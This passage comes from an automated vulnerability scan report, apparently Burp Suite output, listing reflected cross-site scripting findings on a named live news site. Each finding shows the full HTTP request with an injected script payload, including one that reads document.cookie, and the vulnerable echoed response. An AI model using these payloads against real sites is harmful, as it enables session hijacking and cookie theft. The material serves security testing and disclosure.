Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsdba45\"><script>alert(1)</script>288fa1eb525/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.282. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd01"><script>alert(1)</script>e845298fba6 was submitted in the REST URL parameter 6. This input was echoed as dbd01\"><script>alert(1)</script>e845298fba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.jsdbd01"><script>alert(1)</script>e845298fba6 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.jsdbd01\"><script>alert(1)</script>e845298fba6'; }); return true;" >
...[SNIP]...

4.283. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b22"><script>alert(1)</script>617478328a6 was submitted in the REST URL parameter 1. This input was echoed as 18b22\"><script>alert(1)</script>617478328a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content18b22"><script>alert(1)</script>617478328a6/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:19:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:41 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content18b22\"><script>alert(1)</script>617478328a6/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.284. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc5ab"><script>alert(1)</script>856e2c5dba6 was submitted in the REST URL parameter 2. This input was echoed as fc5ab\"><script>alert(1)</script>856e2c5dba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsfc5ab"><script>alert(1)</script>856e2c5dba6/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:42 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsfc5ab\"><script>alert(1)</script>856e2c5dba6/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.285. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb1c"><script>alert(1)</script>67ed783e3fc was submitted in the REST URL parameter 3. This input was echoed as 3eb1c\"><script>alert(1)</script>67ed783e3fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery3eb1c"><script>alert(1)</script>67ed783e3fc/SmoothGallery/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:35 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery3eb1c\"><script>alert(1)</script>67ed783e3fc/SmoothGallery/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.286. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4896"><script>alert(1)</script>ad0bbe39789 was submitted in the REST URL parameter 4. This input was echoed as b4896\"><script>alert(1)</script>ad0bbe39789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryb4896"><script>alert(1)</script>ad0bbe39789/scripts/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:40 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryb4896\"><script>alert(1)</script>ad0bbe39789/scripts/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.287. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28111"><script>alert(1)</script>770bdc224d7 was submitted in the REST URL parameter 5. This input was echoed as 28111\"><script>alert(1)</script>770bdc224d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts28111"><script>alert(1)</script>770bdc224d7/mootools.v1.11.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts28111\"><script>alert(1)</script>770bdc224d7/mootools.v1.11.js'; }); return true;" >
...[SNIP]...

4.288. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8908f"><script>alert(1)</script>1817db57aa4 was submitted in the REST URL parameter 6. This input was echoed as 8908f\"><script>alert(1)</script>1817db57aa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js8908f"><script>alert(1)</script>1817db57aa4 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:43 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js8908f\"><script>alert(1)</script>1817db57aa4'; }); return true;" >
...[SNIP]...

4.289. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 373cd"><script>alert(1)</script>3354bc166e1 was submitted in the REST URL parameter 1. This input was echoed as 373cd\"><script>alert(1)</script>3354bc166e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content373cd"><script>alert(1)</script>3354bc166e1/plugins/sociable/addtofavorites.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:53 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content373cd\"><script>alert(1)</script>3354bc166e1/plugins/sociable/addtofavorites.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.290. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353d7"><script>alert(1)</script>554ec6165a7 was submitted in the REST URL parameter 2. This input was echoed as 353d7\"><script>alert(1)</script>554ec6165a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins353d7"><script>alert(1)</script>554ec6165a7/sociable/addtofavorites.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins353d7\"><script>alert(1)</script>554ec6165a7/sociable/addtofavorites.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.291. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a122"><script>alert(1)</script>7fd0f0415b4 was submitted in the REST URL parameter 3. This input was echoed as 5a122\"><script>alert(1)</script>7fd0f0415b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable5a122"><script>alert(1)</script>7fd0f0415b4/addtofavorites.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:19 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable5a122\"><script>alert(1)</script>7fd0f0415b4/addtofavorites.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.292. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/addtofavorites.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>ff723871d47 was submitted in the REST URL parameter 4. This input was echoed as 23774\"><script>alert(1)</script>ff723871d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/addtofavorites.js23774"><script>alert(1)</script>ff723871d47?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
